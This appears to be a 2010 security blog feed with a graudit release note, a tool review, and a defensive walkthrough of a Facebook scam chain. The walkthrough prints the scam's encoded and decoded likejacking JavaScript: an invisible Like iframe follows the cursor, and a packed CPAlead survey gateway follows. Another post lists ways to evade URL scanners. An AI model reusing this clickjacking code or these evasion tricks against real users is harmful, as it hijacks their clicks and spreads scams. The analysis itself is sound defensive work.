Just Another Hacker tag:www.justanotherhacker.com,2008-02-07://1 2010-07-31T06:13:02Z Kitchen sink security Movable Type 4.23-en Graudit version 1.7 released tag:www.justanotherhacker.com,2010://1.160 2010-07-31T05:51:51Z 2010-07-31T06:13:02Z It is time for another graudit release, and this time it includes some big changes.New PHP signaturesImproved C signatures for fewer false positivesImproved dotnet signaturesWhitespace neutrality for all signatures-l operator lists available databases-x operator for excluding filesconfigure script added to... Eldar Marcussen http://www.justanotherhacker.com
  • New PHP signatures
  • Improved C signatures for fewer false positives
  • Improved dotnet signatures
  • Whitespace neutrality for all signatures
  • -l operator lists available databases
  • -x operator for excluding files
  • configure script added to make chain
  • Makefile install targets changed, install is now server wide
Package maintainers should take note of the last change. The make file currently supports the old style home directory install (make user install), but that is deprecated and will be dropped as ./configure --prefix /home/user/bin --dbdir /home/user/.graudit;make install does the same thing.
I have also added some scripts from my talks, you can find them in the aux directory. There are no install rules for them so they are only available from within the graudit-1.7_src tarball. My thanks to the people who contributed with patches and bug reports, keep them coming.

You can download the latest version from the graudit download page.
]]> Tool review: Halberd tag:www.justanotherhacker.com,2010://1.64 2010-07-09T10:16:54Z 2010-07-10T10:05:04Z Like most of my favourite tools halberd does one thing, and does it well. It tries to detect individual servers behind a load balancer. The idea behind it is not new, but this is the best put together tool that... Eldar Marcussen http://www.justanotherhacker.com halberd-ss.png
Like most of my favourite tools halberd does one thing, and does it well. It tries to detect individual servers behind a load balancer. The idea behind it is not new, but this is the best put together tool that I have used. It even handles multiple A records right off the bat. It is a little short on documentation and the error messages could be better, but it's still a great reconnaissance/testing tools for pen testers and system administrators alike.

Grab your copy today from http://halberd.superadditive.com/

]]> Static analysis with graudit - RMMM June 2010 tag:www.justanotherhacker.com,2010://1.159 2010-06-27T04:24:14Z 2010-07-10T10:15:58Z As promised I have uploaded the slides and the corresponding advisory for my graudit talk at the ruxcon meetup this month. Static analysis with graudit ruxcon presentation - 20100625View more presentations from Eldar Marcussen.... Eldar Marcussen http://www.justanotherhacker.com advisory for my graudit talk at the ruxcon meetup this month.

Static analysis with graudit ruxcon presentation - 20100625
]]> Some thoughts on url scanning tag:www.justanotherhacker.com,2010://1.158 2010-06-17T00:59:58Z 2010-06-17T04:47:20Z Url scanning seems to be an emerging trend. Detecting malware distribution channels and preventing infections is easier than cleaning up the mess they make. The basis of the idea is good, but the current implementations. I have been mulling on... Eldar Marcussen http://www.justanotherhacker.com post (rant?) on url shorteners needing to detect malware.

The initial problems that url scanners face are simple evasion techniques, such as the click to get infected method that you can see in my previous post. This blogspot url scores quite cleanly.
urlscanner-cleanly.jpg
And why shouldn't it? It doesn't contain anything directly malicious and so it should score cleanly until reputation or reactive defense catches up with it. Listen you say, who cares about the herding page, it doesn't do anything, it's the delivery page we care about. If a user visits a "benign" page that redirects him to malware, it will still be stopped at the malicious page!

Alas dear friend, a simple server side block is all it takes to stop http://scanner.novirusthanks.org from accessing the offending page (http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html).
av-ip-ban-avoidance.jpg 
Other documented techniques seen in the wild include only delivering the malicious pay load on 1 of x requests, user agent filtering, js obfu that will break automated deobfu and more. I have seen an alert box break browser automation, so there is no shortage of options for the bad guys. However considering how simple it is to shutdown todays url scanners I doubt we will see too many advanced techniques yet. Url scanning might overcome these simple bypasses in the future, but they should not be considered defense and certainly not a replacement for your desktop AV.

]]> Chasing a rabbit down the hole. tag:www.justanotherhacker.com,2010://1.157 2010-06-11T00:35:54Z 2010-06-11T03:18:19Z Eldar Marcussen http://www.justanotherhacker.com rabbithole.png
Today I noticed this one in my facebook feed and thought; that's different! It's been a while since I chased a rabbit, so down the rabbit hole I went. 
~$ GET http://craziestattoos.blogspot.com/

<meta property="og:title" content="The Guy With The Largest Dick On The Planet">
<meta property="og:type" content="article">
<meta property="og:url" content="http://craziestattoos.blogspot.com/"><link rel="me" href="http://www.blogger.com/profile/09319063164064567908">
<link rel="openid.server" href="http://www.blogger.com/openid-server.g">
<!-- --><style type="text/css">@import url(http://www.blogger.com/static/v1/v-css/navbar/697174003-classic.css);
div.b-mobile {display:none;}
</style>

<script type="text/javascript">
    function setAttributeOnload(object, attribute, val) {
      if(window.addEventListener) {
        window.addEventListener("load",
          function(){ object[attribute] = val; }, false);
      } else {
        window.attachEvent('onload', function(){ object[attribute] = val; });
      }
    }
  </script>
<iframe src="http://www.blogger.com/navbar.g?targetBlogID=6834350941604690306&blogName=The+Guy+With+The+Largest+Dick+On+The+...&publishMode=PUBLISH_MODE_BLOGSPOT&navbarType=BLUE&layoutType=CLASSIC&searchRoot=http%3A%2F%2Fcraziestattoos.blogspot.com%2Fsearch&blogLocale=nl&homepageUrl=http%3A%2F%2Fcraziestattoos.blogspot.com%2F" marginwidth="0" marginheight="0" id="navbar-iframe" allowtransparency="true" title="Blogger Navigation and Search" frameborder="0" height="30" scrolling="no" width="100%"></iframe>
<div></div>
<center><a href="http://access.im/1/AzO93"><img src="http://i46.tinypic.com/33ygjk6.jpg" /></a></center>
<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/4161557039-csitail.js"></script>
<script type="text/javascript">BLOG_initCsi('classic_blogspot');</script></body>
The blogspot page delivers a access.im link visible as a "skip this add page" image and redirects to http:// allhqpics.com/ the-guy-with-the-largest-dick-on-the-planet.html when you click on it. Lets head further down the burrow
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script src="top.js" type="text/javascript"></script>
</head>
<body> 
<script type="text/javascript">
$(document).ready(function() {									
	$("a[name^='faq-']").each(function() {
		$(this).click(function() {
			if( $("#" + this.name).is(':hidden') ) {
				$("#" + this.name).fadeIn('normal');
                                $("a[name^='faq-']").hide('normal');
			} else {
				$("#" + this.name).fadeOut('normal');
			}			
			return false;
		});
	});
});
</script>

<style type="text/css">
.faq-answer {
display:none;
}
</style>
<center><img src="18.png" /></center>
<center><div class="faq-answer" id="faq-1"><img src="pre.jpg"></div></center>
<script src="bottom.js" type="text/javascript"></script>  
</body>
Looks pretty normal, right? I took a look at the jquery.js and at a cursory glance it looks authentic, but then top.js delivers the first rabbit droppings 
~$ GET http://allhqpics.com/top.js
<!--
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%76%61%72%20%69%6E%74%65%72%76%61%6C%3B%0A%20%20%20%20%20%20%20%20%24%28%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%20%20%20%20%69%6E%74%65%72%76%61%6C%3D%73%65%74%49%6E%74%65%72%76%61%6C%28%22%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%3B%22%2C%20%35%30%30%29%3B%0A%7D%29%3B%0A%0A%66%75%6E%63%74%69%6F%6E%20%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%0A%7B%0A%20%20%20%20%69%66%20%28%20%24%28%64%6F%63%75%6D%65%6E%74%2E%61%63%74%69%76%65%45%6C%65%6D%65%6E%74%29%2E%61%74%74%72%28%27%69%64%27%29%3D%3D%22%66%62%66%72%61%6D%65%22%20%29%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%63%6C%65%61%72%49%6E%74%65%72%76%61%6C%28%69%6E%74%65%72%76%61%6C%29%3B%0A%20%20%20%20%20%20%20%20%69%66%6C%61%67%3D%31%3B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%61%6C%6C%68%71%70%69%63%73%2E%63%6F%6D%2F%74%68%65%2D%67%75%79%2D%77%69%74%68%2D%74%68%65%2D%6C%61%72%67%65%73%74%2D%64%69%63%6B%2D%6F%6E%2D%74%68%65%2D%70%6C%61%6E%65%74%2D%32%2E%68%74%6D%6C%22%3B%20%0A%20%20%20%20%7D%20%20%20%20%0A%7D%20%20%0A%20%20%20%20%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A'));
//-->
Decoding that string gives us: 
<script type="text/javascript">
var interval;
        $(function()
{
    interval=setInterval("updateActiveElement();", 500);
});

function updateActiveElement()
{
    if ( $(document.activeElement).attr('id')=="fbframe" ) 
    {
        clearInterval(interval);
        iflag=1;
        document.location="http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html"; 
    }    
}  
        </script>
I'll get back to the second html page in a bit, first lets check bottom.js from the first page: 
~$ GET http://allhqpics.com/bottom.js
<!--
document.write(unescape('%3C%64%69%76%20%73%74%79%6C%65%3D%22%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%20%31%30%70%78%3B%20%68%65%69%67%68%74%3A%20%31%32%70%78%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%66%69%6C%74%65%72%3A%61%6C%70%68%61%28%6F%70%61%63%69%74%79%3D%30%29%3B%20%2D%6D%6F%7A%2D%6F%70%61%63%69%74%79%3A%30%2E%30%3B%20%2D%6B%68%74%6D%6C%2D%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%20%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%22%20%69%64%3D%22%69%63%6F%6E%74%61%69%6E%65%72%22%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%70%6C%75%67%69%6E%73%2F%6C%69%6B%65%2E%70%68%70%3F%68%72%65%66%3D%68%74%74%70%3A%2F%2F%66%75%6E%6E%79%2D%63%65%6C%65%62%2D%70%69%63%73%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%26%61%6D%70%3B%6C%61%79%6F%75%74%3D%73%74%61%6E%64%61%72%64%26%61%6D%70%3B%73%68%6F%77%5F%66%61%63%65%73%3D%66%61%6C%73%65%26%61%6D%70%3B%77%69%64%74%68%3D%34%35%30%26%61%6D%70%3B%61%63%74%69%6F%6E%3D%6C%69%6B%65%26%61%6D%70%3B%66%6F%6E%74%3D%74%61%68%6F%6D%61%26%61%6D%70%3B%63%6F%6C%6F%72%73%63%68%65%6D%65%3D%6C%69%67%68%74%26%61%6D%70%3B%68%65%69%67%68%74%3D%38%30%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%6E%6F%6E%65%3B%20%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%35%30%70%78%3B%20%68%65%69%67%68%74%3A%32%33%70%78%3B%22%20%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3D%22%74%72%75%65%22%20%69%64%3D%22%66%62%66%72%61%6D%65%22%20%6E%61%6D%65%3D%22%66%62%66%72%61%6D%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%2F%64%69%76%3E%0A%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%76%61%72%20%69%66%6C%61%67%20%3D%20%30%3B%0A%20%20%20%20%76%61%72%20%69%63%6F%6E%74%61%69%6E%65%72%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%69%63%6F%6E%74%61%69%6E%65%72%27%29%3B%20%20%20%20%0A%20%20%20%20%76%61%72%20%73%74%61%6E%64%61%72%64%62%6F%64%79%3D%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6D%70%61%74%4D%6F%64%65%3D%3D%22%43%53%53%31%43%6F%6D%70%61%74%22%29%3F%20%64%6F%63%75%6D%65%6E%74%2E%64%6F%63%75%6D%65%6E%74%45%6C%65%6D%65%6E%74%20%3A%20%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%20%2F%2F%63%72%65%61%74%65%20%72%65%66%65%72%65%6E%63%65%20%74%6F%20%63%6F%6D%6D%6F%6E%20%22%62%6F%64%79%22%20%61%63%72%6F%73%73%20%64%6F%63%74%79%70%65%73%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%7B%0A%20%20%20%20%20%20%20%20%2F%2A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%44%4F%20%4E%4F%54%20%45%44%49%54%20%54%48%49%53%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2A%2F%0A%20%20%20%20%69%66%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%29%20%0A%20%20%20%20%7B%20%2F%2F%20%66%6F%72%20%49%45%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%79%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%54%6F%70%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%78%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%4C%65%66%74%2B%27%70%78%27%3B%0A%20%20%20%20%7D%20%0A%20%20%20%20%65%6C%73%65%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%65%2E%70%61%67%65%59%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%65%2E%70%61%67%65%58%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20%7D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%6D%6F%76%65%20%3D%20%66%75%6E%63%74%69%6F%6E%28%65%29%20%7B%0A%20%20%20%20%20%20%20%20%69%66%20%28%69%66%6C%61%67%20%3D%3D%20%30%29%20%7B%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%3B%7D%0A%20%20%20%20%20%20%20%20%65%6C%73%65%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%6E%6F%6E%65%27%3B%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E'));
//-->
Which decodes to: 
<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
<iframe src="http://www.facebook.com/plugins/like.php?href=http://funny-celeb-pics.blogspot.com/&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
</div>
<script>
    var iflag = 0;
    var icontainer = document.getElementById('icontainer');    
    var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
    
    
    
    function mouseFollower(e){
        /*                    DO NOT EDIT THIS                         */
    if (window.event) 
    { // for IE
        icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
        icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
    } 
    else 
    {
        icontainer.style.top = (e.pageY-5)+'px';
        icontainer.style.left = (e.pageX-5)+'px';
    }

    }
    document.onmousemove = function(e) {
        if (iflag == 0) {mouseFollower(e);}
        else
        {
        icontainer.style.display = 'none'; }
    }

    </script>
This gets a little more interesting, now there is a CSRF request to facebook for you to like the malicious site and lure more unsuspecting victims. It's time to pick up the pace and move on. 
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script type="text/javascript" src="http://www.cpalead.com/mygateway.php?pub=42138&gateid=OTM5ODQ%3D"></script>
</head>
<body> 
<script type="text/javascript">
$(document).ready(function() {									
	$("a[name^='faq-']").each(function() {
		$(this).click(function() {
			if( $("#" + this.name).is(':hidden') ) {
				$("#" + this.name).fadeIn('normal');
                                $("a[name^='faq-']").hide('normal');
			} else {
				$("#" + this.name).fadeOut('normal');
			}			
			return false;
		});
	});
});
</script>

<style type="text/css">
.faq-answer {
display:none;
}
<style>
<center><a href="#" name="faq-1"><img src="pre.jpg"></a></center>
<center></a><div class="faq-answer" id="faq-1"><a href="#" name="faq-1"><img src="hero.jpg"></div></center>  
</body>
And the reference to cpalead gives it away. That url delivers your typical function(p,a,c,k,e,d) obfuscated javascript which we decode using the tom liston method 
function showme(txt) {
	document.write("<textarea rows=50 cols=50>");document.write(txt); document.write("</textarea>"); 
}

//Copyright 2010 CPAlead.com

showme(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 124={"123":[{"13":"224=","18":"99","66":"0"},{"13":"200=","18":"50","66":"0"},{"13":"225=","18":"30","66":"0"},{"13":"222=","18":"95","66":"0"}]};9 76(7,189){90(6 65=0;65<124.123.97;65++){4(124.123[65].13==231(7)){153 124.123[65][189]}}}6 108=\'\';6 245=85;6 248=75;6 131=85;6 102=85;6 250=85;6 59=0;6 149=0;6 175=\'79\';6 249=\'242 246 230 228 227 62 239 240 243.\';9 251(113){6 133=19.128;4(247 19.128!=\'9\'){19.128=113}12{19.128=9(){4(133){241{133()}234(235){}}4(113){113()}}}}9 114(7){6 88=2.81("20").207(0);4(88==237){59=59+300;48("114(\'"+7+"\');",300)}12{199(7)}}9 226(7){4(108>0){59=59+108+\'155\';48("114(\'"+7+"\');",108+\'155\')}12{59=59+300;48("114(\'"+7+"\');",300)}}9 177(41){78=2.81(\'64\');90(8=0;8!=78.97;8++){4(78[8].13!=\'24\'){4(41==0){78[8].3.33=\'86\'}4(41==1){78[8].3.33=\'47\'}}}}9 140(41){6 211=2.81(\'236\');90(6 209=2.211,8=0,22;22=209[8];8++){4(22.13!=\'170\'&&22.13!=\'159\'){4(41==0){4(195.198==\'212 220 215\'){22.73(\'87\',\'25\');22.3.33=\'86\'}12{22.73(\'87\',\'25\');6 196=22.252,139=22.244;139.233(22);139.201(22,196)}}4(41==1){22.73(\'87\',\'19\');4(195.198==\'212 220 215\'){22.3.33=\'47\'}}}}}9 150(41){49=2.81(\'238\');90(8=0;8!=49.97;8++){4(49[8].13!=\'170\'&&49[8].13!=\'159\'){4(41==0){49[8].73(\'87\',\'25\');49[8].3.33=\'86\'}4(41==1){49[8].3.33=\'47\';49[8].73(\'87\',\'19\')}}}}9 96(){6 68,61;4(19.104&&19.184){68=19.176+19.223;61=19.104+19.184}12 4(2.20.183>2.20.60){68=2.20.232;61=2.20.183}12{68=2.20.229;61=2.20.60}6 14,58;4(137.104){14=2.74.98?2.74.98:137.176;58=137.104}12 4(2.74&&2.74.89){14=2.74.98;58=2.74.89}12 4(2.20){14=2.20.98;58=2.20.89}181=61<58?58:61;180=68<14?68:14;153 51=146 263(180,181,14,58)}9 141(){6 51=96();4((51[1]-2.5(\'11\').3.23.218("130",""))>30){2.5(\'11\').3.23=(51[1]+\'130\')}4(149==0){48("141();",169)}}9 77(7,178){4(178!=175){34.213.291=\'37://71.43.46/290.72?82=83\'}6 15=2.5(\'11\');6 26=2.5(\'35\');140(1);150(1);177(1);149=1;102=75;4(76(7,\'66\')==1&&191!=75){15.3.120="118(18=0)";15.3.18="0.0";2.5(\'24\').44=\'37://71.292.293/294-109.72\';191=75}12{26.3.21=\'42\';15.3.21=\'42\';2.5(\'24\').44=\'289:288\';2.5(\'24\').3.21=\'42\'}153 85}9 57(174){4(!102&&131){4(19.188&&19.188.185){6 147=1}12{6 147=0}67=146 173();67.44="37://71.43.46/62-145.72?82=83&185="+147+"&145="+174;2.20.161(67);164()}}9 151(148){4(!102&&131){67=146 173();67.44="37://71.43.46/62-145-283.72?82=83&148="+148;2.20.161(67);194(\'37://71.43.46/282.72?82=83\')}}9 156(){4(!2.5(\'11\')){57(\'109-110-132\')}12 4(!2.5(\'35\')){57(\'62-110-132\')}12 4(!2.5(\'24\')){57(\'64-110-132\')}12 4(2.5(\'11\').3.17!="100%"||2.5(\'11\').3.21!="55"||2.5(\'11\').3.33!="47"){57(\'109-163\')}12 4(2.5(\'35\').3.17!="100%"||2.5(\'35\').3.21!="55"||2.5(\'35\').3.33!="47"){57(\'62-163\')}12 4(2.5(\'24\').3.21!="55"){57(\'64-110-47\')}4(2.5(\'24\').60<=300&&2.5(\'24\').60!=0){151(\'64-23-158-\'+2.5(\'24\').60)}12 4(2.5(\'11\').60<=100&&2.5(\'11\').89<=100){151(\'109-23-158-\'+2.5(\'11\').60+\'-\'+2.5(\'11\').89)}48("156()",172)}9 164(){6 143=["\\168\\165\\136\\84\\134\\284","\\136\\84\\167\\134\\187\\204\\84\\216"];19[143[1]][143[0]]()}9 194(217){6 154=["\\296\\168\\165\\287","\\136\\84\\167\\134\\187\\204\\84\\216"];34[154[1]][154[0]]=217}9 219(7){2.5(\'24\').286.213.218(\'37://71.43.46/295.72?82=83&302=203.45.56.190&7=\'+7+\'&299=\'+166(2.298)+\'\')}9 214(7){6 51=96();6 88=2.81("20").207(0);6 15=2.253("10");15.73(\'13\',\'11\');15.3.21=\'42\';15.3.28=\'121\';15.3.34=\'0\';15.3.202=\'0\';15.3.197=\'301\';15.3.17=\'100%\';88.201(15,88.303);142=76(7,\'18\');92=142/100;2.5(\'11\').3.120="118(18="+142+")";2.5(\'11\').3.18=92;15.3.23=(51[1]+\'130\');15.3.21=\'55\';15.3.33=\'47\'}9 199(7){6 106=[\'200%297\'];4(!2.5(\'11\')){214(7)}12{4(2.5(\'11\').3.21=\'42\'){2.5(\'11\').3.21=\'55\';92=76(7,\'18\')/100;2.5(\'11\').3.120="118(18="+92+")";2.5(\'11\').3.18=92}}6 51=96();141();140(0);150(0);6 26=2.5(\'35\');26.3.21=\'55\';26.3.33=\'47\';26.3.28=\'121\';26.3.34=\'0\';26.3.202=\'0\';26.3.197=\'285\';26.3.17=\'100%\';6 144=0;90(6 8=0;8<106.97;8++){4(106[8]==7||106[8]==166(7)){6 157=76(7,\'66\');4(157==1){2.5(\'129\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/160-62/160-280-262-261.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}12{2.5(\'129\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/281/264.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}6 144=1;132=8;260}}4(144==0){2.5(\'129\').53=\'\';2.5(\'116\').53=\'\'}26.3.23=(51[1]+\'130\');48("219(\'"+7+"\');",169);2.5(\'24\').3.21=\'55\';131=75;48("156();",255)}9 171(){119=119-1;2.5("256").53=119;4(119<=0){257()}12{48("171()",172)}}2.16(\'<3 258="36/266">#11{27-32: #155; 120:118(18=80); 18: 0.80; -267-18: 0.80;}\');2.16(\'#35 14 {27:42;52-210:138;32:#206;36-208:42}\');2.16(\'#35 91 {93: 162;}\');2.16(\'#35 14:276 {27:42;52-210:138;32:#206;36-208:275}</3>\');2.16(\'<10 13="35" 3="21:42; 36-39: 38; 277-23: 138; ">\');2.16(\'<10 13="129" 39="38" 3="28: 121; 17: 100%; 31-29: 115;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 13="116" 39="38" 3="28: 121; 17: 100%; 31-29: 125;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 3="278: 152 279 162; 27: 25; 23: 274; 31-29: 273;">\');2.16(\'<64 17="100%" 23="269" 13="24" 44="" 268="75" 270="0" 3="28: 54; 23: 272; 205-65: 86; 205-271: 86; 27-32: 25; 31-29: 254; " 259="265"></64>\');2.16(\'</10></10>\');',10,304,'||document|style|if|getElementById|var|gateid|i|function|div|aijvqsnovujrsfoj3|else|id|a|dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5|write|width|opacity|window|body|display|em|height|wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831|transparent|zcpkmswwmxlgjzbue41a138882143252732d893|background|position|index||z|color|visibility|top|wzjyzgbhqzohhlhvef8426b5a89be2|text|http|center|align||onoroff|none|cpalead|src||com|visible|setTimeout|object_tags||arrayPageSize|font|innerHTML|relative|block||guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9|b|bodyloadtime|offsetHeight|d|widget|right|iframe|x|donation_widget|dpjfszjhzduviwkn424c2477e2d48|c|12px|size|www|php|setAttribute|documentElement|true|getWidgetSetting|mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a|iframe_tags|ytndhhmwdjexjqej106a67d2||getElementsByTagName|pub|42138|x6F|false|hidden|wmode|gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62|clientHeight|for|img|opacity_setting_moz|border|static||getPageSize|length|clientWidth|||alt|cbtonfugwctexmjdff8bd9e3648ab7|images|innerHeight|pointer|closebuttons|onclick|popup_delay|overlay|not|Close|cursor|func|checkForBody|11863866|arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c|Widget|alpha|countdown|filter|absolute|135px|settings|widgetJSON|11863936|172px|452px|onload|lpepmphihufelzdd28c18f8093587772fdd38f|px|ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6|found|oldonload|x61||x6C|self|normal|pn|jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37|dontscroll|opacity_setting_ie|_0x96be|has_closebtn|tamper|new|hasfirebug|reason|mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e|mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22|ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69|72px|return|_0xb500|000|hienslexztaecvon972b4c6959457b72d8591114abeb305d|is_donation|invalid|video_bucket|rice|appendChild|0px|styles|sgfplcetedjsqmbvbbcb115|x65|escape|x63|x72|500|video_controller|secondpass|1000|Image|tampertype|xwwjxyvbmsrjfpud17e9cae225420|innerWidth|yecqogvnndwlktmu|adixdgozwczhuvaf6e84b|png|pageWidth|pageHeight|gif|scrollHeight|scrollMaxY|firebug|225px|x74|console|settingname||secondclose|blank7|158px|lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73|navigator|nx|zIndex|appName|myGatewayStart|NzMxNTM|insertBefore|left||x69|overflow|fff|item|decoration|ems|weight|embeds|Microsoft|location|createOverlay|Explorer|x6E|url|replace|loadGatewayIframe|Internet|closebtn|ODA1OTE|scrollMaxX|OTM5ODQ|NzM5NTQ|startGateway|this|disable|offsetWidth|to|unescape|scrollWidth|removeChild|catch|e|embed|null|object|has|been|try|Your|logged|parentNode|countdownStarted|attempt|typeof|isloaded|gmgqvtjawhodlboj8b0d5f2c|bodyexisted|addWidgetLoadEvent|nextSibling|createElement|11863886|5000|closelink|riunpfcaxfcggjhpf|type|scrollbars|break|button|close|Array|close_btn|NO|css|moz|allowtransparency|640|frameborder|y|640px|11863881|482px|underline|hover|line|margin|auto|skin|help|nostyle|test|x64|11863846|contentWindow|x66|blank|about|adblock|href|surveysforcharity|org|thankyou|mygateway_iframe_loader|x68|3D|referrer|ref||11863836|subid|firstChild'.split('|'),0,{}))
Which gives us more obfuscated javascript 
